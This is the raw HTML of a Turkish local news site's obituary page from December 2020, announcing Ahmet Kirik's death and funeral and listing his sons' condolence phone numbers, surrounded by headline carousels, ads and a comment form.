src="http://www.elbistaninsesi.com/images/haberler/thumbs/2016/08/piazzada_indirim_yarisi.jpg" alt="Piazza’da indirim yarışı" /> Piazza’da indirim yarışı</a> </div> </div></div> </div> </div> </div> </div> <div id="mainContainer" class="container center shadow" style="padding-top:15px;"> <img src="http://www.elbistaninsesi.com/images/aboneol.jpg" width="937" height="45" /><br> <br> <!-- Üst Manşet --> <div id="ustkisim" class="row"> <div class="span12 reklam reklam106"><a href="http://www.elbistaninsesi.com/banner.php?id=136" target="_blank" rel="nofollow"><img src="http://www.elbistaninsesi.com/thumb.php?src=http://www.elbistaninsesi.com/images/banner/YaYam_Hastanesi_980.jpg&w=980&h=250&q=90" width="980" height="250" style="width:980px;height: 250px;border:0" alt="banner136" /></a></div> <div id="ustmanset" class="span12"> <div class="row-fluid"> <ul class="thumbnails five"> <li class="span3"><a href="http://www.elbistaninsesi.com/guncel/cig-sehidi-ali-ozdemir-son-yolculuguna-ugurlandi-h68828.html" title="Çığ şehidi Ali Özdemir son yolculuğuna uğurlandı" > <img src="http://www.elbistaninsesi.com/images/haberler/ustmanset/2020/12/Ysimsiz-1_19.jpg" alt="Çığ şehidi Ali Özdemir son yolculuğuna uğurlandı" class="pull-left" /> <div class="caption-line"><p>Çığ şehidi Ali Özdemir son...</p></div> </a> </li> <li class="span3"><a href="http://www.elbistaninsesi.com/guncel/elbistanli-milli-yuzucu-merve-tuncel-dunya-rekorunu-altust-etti-h68824.html" title="Elbistanlı milli yüzücü Merve Tuncel, dünya rekorunu altüst etti" > <img src="http://www.elbistaninsesi.com/images/haberler/ustmanset/2020/12/Ysimsiz-1_18.jpg" alt="Elbistanlı milli yüzücü Merve Tuncel, dünya rekorunu altüst etti" class="pull-left" /> <div class="caption-line"><p>Elbistanlı milli yüzücü Merve Tuncel,...</p></div> </a> </li> <li class="span3"><a href="http://www.elbistaninsesi.com/guncel/cig-altinda-kalan-goksunlu-askerden-aci-haber-geldi-h68814.html" title="Çığ altında kalan Göksunlu askerden acı haber geldi" > <img src="http://www.elbistaninsesi.com/images/haberler/ustmanset/2020/12/612715e8-a26c-4606-b9d0-5568634c68b2.jpg" alt="Çığ altında kalan Göksunlu askerden acı haber geldi" class="pull-left" /> <div class="caption-line"><p>Çığ altında kalan Göksunlu askerden...</p></div> </a> </li> <li class="span3"><a href="http://www.elbistaninsesi.com/guncel/bulut-elbistanin-sorunlarinin-ip-yumagi-gibi-toplanmamasi-gerekirdi-h68806.html" title="Bulut: “Elbistan’ın sorunlarının ip yumağı gibi toplanmaması gerekirdi”" > <img src="http://www.elbistaninsesi.com/images/haberler/ustmanset/2020/12/Ysimsiz-1_17.jpg" alt="Bulut: “Elbistan’ın sorunlarının ip yumağı gibi toplanmaması gerekirdi”" class="pull-left" /> <div class="caption-line"><p>Bulut: “Elbistan’ın sorunlarının ip yumağı...</p></div> </a> </li> <li class="span3"><a href="http://www.elbistaninsesi.com/guncel/toki-sosyal-konutlari-icin-ilk-kazma-vuruldu-h68803.html" title="TOKİ sosyal konutları için ilk kazma vuruldu" > <img src="http://www.elbistaninsesi.com/images/haberler/ustmanset/2020/12/Ysimsiz-1_16.jpg" alt="TOKİ sosyal konutları için ilk kazma vuruldu" class="pull-left" /> <div class="caption-line"><p>TOKİ sosyal konutları için ilk...</p></div> </a> </li> </ul> </div> </div> <div class="span12 reklam reklam109"><script async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script> <!-- kaynarca --> <ins class="adsbygoogle" style="display:block" data-ad-client="ca-pub-3633419220222736" data-ad-slot="5807534991" data-ad-format="auto" data-full-width-responsive="true"></ins> <script> (adsbygoogle = window.adsbygoogle || []).push({}); </script> </div> </div> <!-- MAIN --> <div class="row"> <div class="page-header-fixed style hide"> <div class="title"></div> <div class="pull-right"> <span class="scroll-link d-goto" id="yorumyaplink" style="margin-right: 15px;"><i class="halflings-icon comments"></i> Yorum Yap</span> <a class="print d-print" href="javascript:window.print()" style="margin-right: 15px;"><i class="halflings-icon print"></i> Yazdır</a> <a href="javascript:void(0);" onclick="shareFacebook(gsTitle, gsUrl);" class="d-share" rel="nofollow" style="margin-right: 15px;"><i class="halflings-icon share-alt"></i> <b>Facebook</b>'ta Paylaş</a> </div> </div> <!-- Sol Blok --> <div id="main" class="span8"> <div class="reklam reklam129"><a href="http://www.elbistaninsesi.com/banner.php?id=162" target="_blank" rel="nofollow"><img src="http://www.elbistaninsesi.com/thumb.php?src=http://www.elbistaninsesi.com/images/banner/balYk_dunyasY.jpg&w=600&h=200&q=90" width="600" height="200" style="width:600px;height: 200px;border:0" alt="banner162" /></a></div> <article id="haber"> <div class="page-header clearfix"> <h1 class="title gs-title" itemprop="name">Ahmet Kirik 74 yaşında</h1> <h2 class="lead" itemprop="description"><strong></strong></h2> </div> <div class="row-fluid muted"> <p class="pull-left"><span itemprop="datePublished" class="tarih-degistir" data-date="2020-12-29 12:46:21" content="2020-12-29T12:46:21+02:00">29 Aralık 2020 Salı 12:46</span></p> </div> <div class="row-fluid newspic"> <span> <img src="http://www.elbistaninsesi.com/images/haberler/2020/12/ahmet_kirik_74_yasinda_h68826_94faa.jpg" alt="Ahmet Kirik 74 yaşında" itemprop="image"/> </span> </div> <div class="row-fluid page-social"> <div class="span9"> <div class="shr"> <div class="gs-share"> <a class="gs-twitter"></a> <a class="gs-facebook"></a> <a class="gs-linkedin"></a> <a class="gs-google"></a> <div class="fb-like" data-href="http://www.elbistaninsesi.com/vefatlar/ahmet-kirik-74-yasinda-h68826.html" data-width="100" data-layout="button_count" data-action="like" data-show-faces="true" data-share="true"></div> </div> <div id="fb-root"></div> <script>(function(d, s, id) { var js, fjs = d.getElementsByTagName(s)[0]; if (d.getElementById(id)) return; js = d.createElement(s); js.id = id; js.src = "//connect.facebook.net/tr_TR/all.js#xfbml=1"; fjs.parentNode.insertBefore(js, fjs); }(document, 'script', 'facebook-jssdk'));</script> </div> </div> <div class="span3 karakterislem secilemez"> <i class="glyphicons-icon text_smaller"></i> <i class="glyphicons-icon text_bigger"></i> <i class="glyphicons-icon font"></i> <a class="print" href="javascript:window.print()"><i class="glyphicons-icon print"></i></a> </div> </div> <div id="newstext" class="row-fluid page-content"> <div class="reklam reklam135 text-center"><a href="http://www.elbistaninsesi.com/banner.php?id=43" target="_blank" rel="nofollow"><img src="http://www.elbistaninsesi.com/images/banner/rehber_emlak_son_1.gif" width="600" height="200" style="width:600px;height: 200px;border:0" alt="banner43" /></a></div> <div itemprop="articleBody" id="newsbody"><span style="font-size: 16px;"><br/> Ekinözü ilçesine bağlı Kandil Mahallesi’nin Durud mezrasından merhum Şaban Kirik'in oğlu ; Mehmet, Ali, Feyzi, Kadir, Hürü, Eşe ve Fadime kardeşlerin abisi, Yunus, Şaban, Muhammed, İsa, Fadime ve Kadir kardeşlerin babası Ahmet Kirik vefat etmiştir. Cenazesi 29 Aralık 2020 Salı günü öğle namazına müteakip Müftü Reşit Efendi caminde namazı kılınacaktır. <br/> Taziye telefonları<br/> Oğlu Yunus 0537 854 75 64<br/> Oğlu Şaban 0542 433 15 57<br/> Oğlu İsa 0544 764 52 86<br/> Oğlu Mert 0553 653 96 87<br/> oğlu Kadir 0542 667 26 28<br/> oğlu Fevzi 0543 301 20 97 <br/> <br/> </span><br/></div> </div> <br> <div class="box ilgili"> <div class="box header black"> <a href="#"><h5 class="glyphicons fire">Yerel Manşetler</h5></a> </div> </article> <div class="hide-print"> <div id="anamanset" class="carousel hs-manset slid"> <ol class="carousel-indicators twentyfive carousel-hover"> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/daglarin-susu-olan-yaban-kecileri-icin-envanter-calismasi-baslatildi-h68833.html'; return false;" data-target="#anamanset" data-slide-to="0" class="active">1</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/nurhak-belediyesi-asgari-ucreti-3-bin-100-tl-olarak-acikladi-h68832.html'; return false;" data-target="#anamanset" data-slide-to="1" >2</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/mtv-tutarlari-belli-oldu-h68831.html'; return false;" data-target="#anamanset" data-slide-to="2" >3</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/hizmet-bulteni-gazetesinin-ucuncu-sayisi-okuyucu-ile-bulustu-h68830.html'; return false;" data-target="#anamanset" data-slide-to="3" >4</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/kalbine-yenilen-huseyin-gunes-icin-anma-programi-duzenlendi-h68829.html'; return false;" data-target="#anamanset" data-slide-to="4" >5</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/cig-sehidi-ali-ozdemir-son-yolculuguna-ugurlandi-h68828.html'; return false;" data-target="#anamanset" data-slide-to="5" >6</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/elbistanli-milli-yuzucu-merve-tuncel-dunya-rekorunu-altust-etti-h68824.html'; return false;" data-target="#anamanset" data-slide-to="6" >7</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/baskan-gungorden-elbistan-teskilatina-hayirli-olsun-ziyareti-h68820.html'; return false;" data-target="#anamanset" data-slide-to="7" >8</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/emyo-akademik-kadrosunu-guclendiriyor-h68819.html'; return false;" data-target="#anamanset" data-slide-to="8" >9</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/barla-al-gotur-oku-getir-kutuphanesine-kitap-destegi-h68818.html'; return false;" data-target="#anamanset" data-slide-to="9" >10</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/cig-altinda-kalan-goksunlu-askerden-aci-haber-geldi-h68814.html'; return false;" data-target="#anamanset" data-slide-to="10" >11</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/otomobil-ucuruma-yuvarlandi-1-olu-h68813.html'; return false;" data-target="#anamanset" data-slide-to="11" >12</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/cig-altinda-kalan-goksunlu-askeri-arama-calismalari-suruyor-h68812.html'; return false;" data-target="#anamanset" data-slide-to="12" >13</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/gocuk-alani-drone-ile-goruntulendi-h68810.html'; return false;" data-target="#anamanset" data-slide-to="13" >14</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/sokaga-cikma-yasaginda-unutulmadilar-h68807.html'; return false;" data-target="#anamanset" data-slide-to="14" >15</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/bulut-elbistanin-sorunlarinin-ip-yumagi-gibi-toplanmamasi-gerekirdi-h68806.html'; return false;" data-target="#anamanset" data-slide-to="15" >16</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/baskan-paksoydan-yerel-esnafina-sahip-cik-cagrisi-h68805.html'; return false;" data-target="#anamanset" data-slide-to="16" >17</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/baskan-general-2020-yilini-degerlendirdi-h68804.html'; return false;" data-target="#anamanset" data-slide-to="17" >18</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/toki-sosyal-konutlari-icin-ilk-kazma-vuruldu-h68803.html'; return false;" data-target="#anamanset" data-slide-to="18" >19</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/turkcellden-hat-alanlar-hattini-tasiyanlar-ve-cihaz-alanlara-ozel-kampanya-h68801.html'; return false;" data-target="#anamanset" data-slide-to="19" >20</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/jandarma-trafik-ekipleri-eba-dan-ogrencilere-trafik-dersi-verdi-h68800.html'; return false;" data-target="#anamanset" data-slide-to="20" >21</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/baskan-gurbuz-harita-muhendisleri-ile-imar-kanunu-madde-18i-istisare-etti-h68799.html'; return false;" data-target="#anamanset" data-slide-to="21" >22</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/gocugun-oldugu-bolgeden-ilk-goruntuler-ve-detaylar-h68798.html'; return false;" data-target="#anamanset" data-slide-to="22" >23</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/ael-komur-sahasinda-gocuk-h68797.html'; return false;" data-target="#anamanset" data-slide-to="23" >24</li> <li onclick="window.location='http://www.elbistaninsesi.com/guncel/emniyet-muduru-hakan-asika-yeni-gorev-h68795.html'; return false;" data-target="#anamanset" data-slide-to="24" >25</li> </ol> <div class="carousel-inner"> <div class="item active"> <a href="http://www.elbistaninsesi.com/guncel/daglarin-susu-olan-yaban-kecileri-icin-envanter-calismasi-baslatildi-h68833.html" title="Dağların süsü olan yaban keçileri için envanter çalışması başlatıldı"> <img src="http://www.elbistaninsesi.com/images/haberler/2020/12/daglarin_susu_olan_yaban_kecileri_icin_envanter_calismasi_baslatildi_h68833_d4b65.jpg" alt="Dağların süsü olan yaban keçileri için envanter çalışması başlatıldı" /> <div class="carousel-caption"> <h2> <span style="font-size:">Dağların süsü olan yaban keçileri için envanter çalışması başlatıldı</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/nurhak-belediyesi-asgari-ucreti-3-bin-100-tl-olarak-acikladi-h68832.html" title="Nurhak Belediyesi, asgari ücreti 3 bin 100 TL olarak açıkladı"> <img src="http://www.elbistaninsesi.com/images/haberler/2020/12/nurhak_belediyesi_asgari_ucreti_3_bin_100_tl_olarak_acikladi_h68832_0c205.jpg" alt="Nurhak Belediyesi, asgari ücreti 3 bin 100 TL olarak açıkladı" /> <div class="carousel-caption"> <h2> <span style="font-size:">Nurhak Belediyesi, asgari ücreti 3 bin 100 TL olarak açıkladı</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/mtv-tutarlari-belli-oldu-h68831.html" title="MTV tutarları belli oldu"> <img src="http://www.elbistaninsesi.com/images/haberler/2020/12/mtv_tutarlari_belli_oldu_h68831_4deb9.jpg" alt="MTV tutarları belli oldu" /> <div class="carousel-caption"> <h2> <span style="font-size:">MTV tutarları belli oldu</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/hizmet-bulteni-gazetesinin-ucuncu-sayisi-okuyucu-ile-bulustu-h68830.html" title="Hizmet Bülteni Gazetesinin üçüncü sayısı okuyucu ile buluştu"> <img src="http://www.elbistaninsesi.com/images/haberler/2020/12/hizmet_bulteni_gazetesinin_ucuncu_sayisi_okuyucu_ile_bulustu_h68830_a2f67.jpg" alt="Hizmet Bülteni Gazetesinin üçüncü sayısı okuyucu ile buluştu" /> <div class="carousel-caption"> <h2> <span style="font-size:">Hizmet Bülteni Gazetesinin üçüncü sayısı okuyucu ile buluştu</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/kalbine-yenilen-huseyin-gunes-icin-anma-programi-duzenlendi-h68829.html" title="Kalbine yenilen Hüseyin Güneş için anma programı düzenlendi"> <img src="http://www.elbistaninsesi.com/images/haberler/2020/12/kalbine_yenilen_huseyin_gunes_icin_anma_programi_duzenlendi_h68829_569c0.jpg" alt="Kalbine yenilen Hüseyin Güneş için anma programı düzenlendi" /> <div class="carousel-caption"> <h2> <span style="font-size:">Kalbine yenilen Hüseyin Güneş için anma programı düzenlendi</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/cig-sehidi-ali-ozdemir-son-yolculuguna-ugurlandi-h68828.html" title="Çığ şehidi Ali Özdemir son yolculuğuna uğurlandı"> <img src="http://www.elbistaninsesi.com/images/haberler/2020/12/cig_sehidi_ali_ozdemir_son_yolculuguna_ugurlandi_h68828_7c6d2.jpg" alt="Çığ şehidi Ali Özdemir son yolculuğuna uğurlandı" /> <div class="carousel-caption"> <h2> <span style="font-size:">Çığ şehidi Ali Özdemir son yolculuğuna uğurlandı</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/elbistanli-milli-yuzucu-merve-tuncel-dunya-rekorunu-altust-etti-h68824.html" title="Elbistanlı milli yüzücü Merve Tuncel, dünya rekorunu altüst etti"> <img src="http://www.elbistaninsesi.com/images/haberler/2020/12/elbistanli_milli_yuzucu_merve_tuncel_dunya_rekorunu_altust_etti_h68824_f569b.jpg" alt="Elbistanlı milli yüzücü Merve Tuncel, dünya rekorunu altüst etti" /> <div class="carousel-caption"> <h2> <span style="font-size:">Elbistanlı milli yüzücü Merve Tuncel, dünya rekorunu altüst etti</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/baskan-gungorden-elbistan-teskilatina-hayirli-olsun-ziyareti-h68820.html" title="Başkan Güngör’den Elbistan Teşkilatına Hayırlı Olsun Ziyareti"> <img src="http://www.elbistaninsesi.com/images/haberler/2020/12/baskan_gungorden_elbistan_teskilatina_hayirli_olsun_ziyareti_h68820_be973.jpg" alt="Başkan Güngör’den Elbistan Teşkilatına Hayırlı Olsun Ziyareti" /> <div class="carousel-caption"> <h2> <span style="font-size:">Başkan Güngör’den Elbistan Teşkilatına Hayırlı Olsun Ziyareti</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/emyo-akademik-kadrosunu-guclendiriyor-h68819.html" title="EMYO, akademik kadrosunu güçlendiriyor"> <img src="http://www.elbistaninsesi.com/images/haberler/2020/12/emyo_akademik_kadrosunu_guclendiriyor_h68819_fee1a.jpg" alt="EMYO, akademik kadrosunu güçlendiriyor" /> <div class="carousel-caption"> <h2> <span style="font-size:">EMYO, akademik kadrosunu güçlendiriyor</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/barla-al-gotur-oku-getir-kutuphanesine-kitap-destegi-h68818.html" title="Barla Al Götür Oku Getir Kütüphanesi’ne kitap desteği"> <img src="http://www.elbistaninsesi.com/images/haberler/2020/12/barla_al_gotur_oku_getir_kutuphanesine_kitap_destegi_h68818_d4989.jpg" alt="Barla Al Götür Oku Getir Kütüphanesi’ne kitap desteği" /> <div class="carousel-caption"> <h2> <span style="font-size:">Barla Al Götür Oku Getir Kütüphanesi’ne kitap desteği</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/cig-altinda-kalan-goksunlu-askerden-aci-haber-geldi-h68814.html" title="Çığ altında kalan Göksunlu askerden acı haber geldi"> <img src="http://www.elbistaninsesi.com/images/haberler/2020/12/cig_altinda_kalan_goksunlu_askerden_aci_haber_geldi_h68814_30ccc.jpg" alt="Çığ altında kalan Göksunlu askerden acı haber geldi" /> <div class="carousel-caption"> <h2> <span style="font-size:">Çığ altında kalan Göksunlu askerden acı haber geldi</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/otomobil-ucuruma-yuvarlandi-1-olu-h68813.html" title="Otomobil uçuruma yuvarlandı: 1 ölü"> <img src="http://www.elbistaninsesi.com/images/haberler/2020/12/otomobil_ucuruma_yuvarlandi_1_olu_h68813_0fa08.jpg" alt="Otomobil uçuruma yuvarlandı: 1 ölü" /> <div class="carousel-caption"> <h2> <span style="font-size:">Otomobil uçuruma yuvarlandı: 1 ölü</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/cig-altinda-kalan-goksunlu-askeri-arama-calismalari-suruyor-h68812.html" title="Çığ altında kalan Göksunlu askeri arama çalışmaları sürüyor"> <img src="http://www.elbistaninsesi.com/images/haberler/2020/12/cig_altinda_kalan_goksunlu_askeri_arama_calismalari_suruyor_h68812_28368.jpg" alt="Çığ altında kalan Göksunlu askeri arama çalışmaları sürüyor" /> <div class="carousel-caption"> <h2> <span style="font-size:">Çığ altında kalan Göksunlu askeri arama çalışmaları sürüyor</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/gocuk-alani-drone-ile-goruntulendi-h68810.html" title="Göçük alanı drone ile görüntülendi"> <img src="http://www.elbistaninsesi.com/images/haberler/2020/12/gocuk_alani_drone_ile_goruntulendi_h68810_2ecc7.jpg" alt="Göçük alanı drone ile görüntülendi" /> <div class="carousel-caption"> <h2> <span style="font-size:">Göçük alanı drone ile görüntülendi</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/sokaga-cikma-yasaginda-unutulmadilar-h68807.html" title="Sokağa çıkma yasağında unutulmadılar"> <img src="http://www.elbistaninsesi.com/images/haberler/2020/12/sokaga_cikma_yasaginda_unutulmadilar_h68807_af5c6.jpg" alt="Sokağa çıkma yasağında unutulmadılar" /> <div class="carousel-caption"> <h2> <span style="font-size:">Sokağa çıkma yasağında unutulmadılar</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/bulut-elbistanin-sorunlarinin-ip-yumagi-gibi-toplanmamasi-gerekirdi-h68806.html" title="Bulut: “Elbistan’ın sorunlarının ip yumağı gibi toplanmaması gerekirdi”"> <img src="http://www.elbistaninsesi.com/images/haberler/2020/12/bulut_elbistanin_sorunlarinin_ip_yumagi_gibi_toplanmamasi_gerekirdi_h68806_0d8da.jpg" alt="Bulut: “Elbistan’ın sorunlarının ip yumağı gibi toplanmaması gerekirdi”" /> <div class="carousel-caption"> <h2> <span style="font-size:">Bulut: “Elbistan’ın sorunlarının ip yumağı gibi toplanmaması gerekirdi”</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/baskan-paksoydan-yerel-esnafina-sahip-cik-cagrisi-h68805.html" title="Başkan Paksoy’dan ‘Yerel Esnafına Sahip Çık’ çağrısı"> <img src="http://www.elbistaninsesi.com/images/haberler/2020/12/baskan_paksoydan_yerel_esnafina_sahip_cik_cagrisi_h68805_9f749.jpg" alt="Başkan Paksoy’dan ‘Yerel Esnafına Sahip Çık’ çağrısı" /> <div class="carousel-caption"> <h2> <span style="font-size:">Başkan Paksoy’dan ‘Yerel Esnafına Sahip Çık’ çağrısı</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/baskan-general-2020-yilini-degerlendirdi-h68804.html" title="Başkan General, 2020 yılını değerlendirdi"> <img src="http://www.elbistaninsesi.com/images/haberler/2020/12/baskan_general_2020_yilini_degerlendirdi_h68804_ed89a.jpg" alt="Başkan General, 2020 yılını değerlendirdi" /> <div class="carousel-caption"> <h2> <span style="font-size:">Başkan General, 2020 yılını değerlendirdi</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/toki-sosyal-konutlari-icin-ilk-kazma-vuruldu-h68803.html" title="TOKİ sosyal konutları için ilk kazma vuruldu"> <img src="http://www.elbistaninsesi.com/images/haberler/2020/12/toki_sosyal_konutlari_icin_ilk_kazma_vuruldu_h68803_b3097.jpg" alt="TOKİ sosyal konutları için ilk kazma vuruldu" /> <div class="carousel-caption"> <h2> <span style="font-size:">TOKİ sosyal konutları için ilk kazma vuruldu</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/turkcellden-hat-alanlar-hattini-tasiyanlar-ve-cihaz-alanlara-ozel-kampanya-h68801.html" title="Turkcell’den hat alanlar, hattını taşıyanlar ve cihaz alanlara özel kampanya"> <img src="http://www.elbistaninsesi.com/images/haberler/2020/12/turkcellden_hat_alanlar_hattini_tasiyanlar_ve_cihaz_alanlara_ozel_kampanya_h68801_f3bf1.jpg" alt="Turkcell’den hat alanlar, hattını taşıyanlar ve cihaz alanlara özel kampanya" /> <div class="carousel-caption"> <h2> <span style="font-size:">Turkcell’den hat alanlar, hattını taşıyanlar ve cihaz alanlara özel kampanya</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/jandarma-trafik-ekipleri-eba-dan-ogrencilere-trafik-dersi-verdi-h68800.html" title="Jandarma trafik ekipleri EBA&#039;dan öğrencilere trafik dersi verdi"> <img src="http://www.elbistaninsesi.com/images/haberler/2020/12/jandarma_trafik_ekipleri_eba_dan_ogrencilere_trafik_dersi_verdi_h68800_f8e46.jpg" alt="Jandarma trafik ekipleri EBA&#039;dan öğrencilere trafik dersi verdi" /> <div class="carousel-caption"> <h2> <span style="font-size:">Jandarma trafik ekipleri EBA&#039;dan öğrencilere trafik dersi verdi</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/baskan-gurbuz-harita-muhendisleri-ile-imar-kanunu-madde-18i-istisare-etti-h68799.html" title="Başkan Gürbüz, harita mühendisleri ile imar kanunu madde 18’i istişare etti"> <img src="http://www.elbistaninsesi.com/images/haberler/2020/12/baskan_gurbuz_harita_muhendisleri_ile_imar_kanunu_madde_18i_istisare_etti_h68799_bd277.jpg" alt="Başkan Gürbüz, harita mühendisleri ile imar kanunu madde 18’i istişare etti" /> <div class="carousel-caption"> <h2> <span style="font-size:">Başkan Gürbüz, harita mühendisleri ile imar kanunu madde 18’i istişare etti</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/gocugun-oldugu-bolgeden-ilk-goruntuler-ve-detaylar-h68798.html" title="Göçüğün olduğu bölgeden ilk görüntüler ve detaylar"> <img src="http://www.elbistaninsesi.com/images/haberler/2020/12/gocugun_oldugu_bolgeden_ilk_goruntuler_ve_detaylar_h68798_786bf.jpg" alt="Göçüğün olduğu bölgeden ilk görüntüler ve detaylar" /> <div class="carousel-caption"> <h2> <span style="font-size:">Göçüğün olduğu bölgeden ilk görüntüler ve detaylar</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/ael-komur-sahasinda-gocuk-h68797.html" title="AEL kömür sahasında göçük"> <img src="http://www.elbistaninsesi.com/images/haberler/2020/12/ael_komur_sahasinda_gocuk_h68797_b7512.jpg" alt="AEL kömür sahasında göçük" /> <div class="carousel-caption"> <h2> <span style="font-size:">AEL kömür sahasında göçük</span> </h2> </div> </a> </div> <div class="item"> <a href="http://www.elbistaninsesi.com/guncel/emniyet-muduru-hakan-asika-yeni-gorev-h68795.html" title="Emniyet Müdürü Hakan Aşık’a yeni görev"> <img src="http://www.elbistaninsesi.com/images/haberler/2020/12/emniyet_muduru_hakan_asika_yeni_gorev_h68795_be212.jpg" alt="Emniyet Müdürü Hakan Aşık’a yeni görev" /> <div class="carousel-caption"> <h2> <span style="font-size:">Emniyet Müdürü Hakan Aşık’a yeni görev</span> </h2> </div> </a> </div> </div> <a class="carousel-control left" href="#anamanset" data-slide="prev">&lsaquo;</a> <a class="carousel-control right" href="#anamanset" data-slide="next">&rsaquo;</a> </div> </div> <div class="row-fluid galleries"> <div class="title"> <span>İlgili Galeriler</span><hr> </div> <div class="content"> <div class="span3"> <a href="http://www.elbistaninsesi.com/elbistan-tarihi-organizeye-ev-sahipligi-yapti-resimleri,38.html" title="Elbistan, tarihi organizeye ev sahipliği yaptı"> <img src="http://www.elbistaninsesi.com/images/album/thumbs/DSC_5431.jpg" alt="Elbistan, tarihi organizeye ev sahipliği yaptı" /> <b>Elbistan, tarihi organizeye ev sahipliği yaptı</b> </a> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/donatir-mobilyadan-hediye-yagmuru-resimleri,37.html" title="Donatır Mobilya’dan hediye yağmuru"> <img src="http://www.elbistaninsesi.com/images/album/thumbs/donatYr_mobilya_cekiliY_1.jpg" alt="Donatır Mobilya’dan hediye yağmuru" /> <b>Donatır Mobilya’dan hediye yağmuru</b> </a> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/otomobilde-yanarak-can-verdiler-resimleri,36.html" title="Otomobilde yanarak can verdiler"> <img src="http://www.elbistaninsesi.com/images/album/thumbs/DSC_8860.jpg" alt="Otomobilde yanarak can verdiler" /> <b>Otomobilde yanarak can verdiler</b> </a> </div> </div> </div> <div id="yorumyap" style="margin:0"></div> <div class="row-fluid keywords"><div class="title">Anahtar Kelimeler:</div><a href="http://www.elbistaninsesi.com/haberleri/Ahmet+Kirik+74+ya%C5%9F%C4%B1nda" title="Ahmet Kirik 74 Yaşında haberleri">Ahmet Kirik 74 Yaşında</a></div> <section> <div id="yorumlar"> <ul class="nav nav-tabs" id="ytab"> <li class="active"><a href="#yorumpanel" data-toggle="tab">Yorum Gönder <span class="label label-important">0</span></a></li> <li><a href="#facebookpanel" class="fbyorum" data-toggle="tab">Facebook Yorumları <span class="label label-inverse"><fb:comments-count href="http://www.elbistaninsesi.com/vefatlar/ahmet-kirik-74-yasinda-h68826.html">0</fb:comments-count></span></a></li> </ul> <div class="tab-content"> <div class="tab-pane active" id="yorumpanel"> <div class="yorumlar panel"> <div id="yorumpaneli" class="row-fluid"> <form name="comment" class="comment_form" id="addcomment"> <div class="span1"> <img src="http://www.elbistaninsesi.com/_themes/hs-rush-php/images/no_author.jpg" alt="Avatar" class="img-rounded"/> </div> <div class="span11"> <div class="row-fluid"> <div class="input-prepend span6"> <span class="add-on">Adınız</span> <input name="isim" class="span10 adsoyad" type="text" id="adsoyad" size="30" maxlength="50" title="Ad soyad gerekli!" /> </div> </div> <textarea name="yorum" maxlength="1000" class="span12" id="comment_field" onkeyup="textKey(this.form)" placeholder="Yorum yazmak için bu alanı kullanabilirsiniz. Yorum yazarken lütfen aşağıda yazılan uyarıları göz önünde bulundurunuz!"></textarea> <div class="span12" style="margin:0;"> <div class="answer span5" style="display:none;">Yanıt: <b>@name</b> <a href="javascript:void(0)" class="kaldir">x</a></div> <a type="button" href="javascript:void(0)" onclick="javascript:comment_send(68826);return false;" class="btn btn-warning pull-right">Yorum Gönder</a> <div class="karakter span4 pull-right">Kalan Karakter: <input name="character" id="character" disabled size="3" value="1000"></div></div> </div> <input type="hidden" name="hid" value="68826" /> <input type="hidden" name="uid" value="0" /> <input type="hidden" name="tip" value="haber" /> <input type="hidden" name="cevap" value="" class="answer" /> <input type="hidden" name="cevap_id" value="0" class="cevap_id" /> <input type="hidden" name="token" 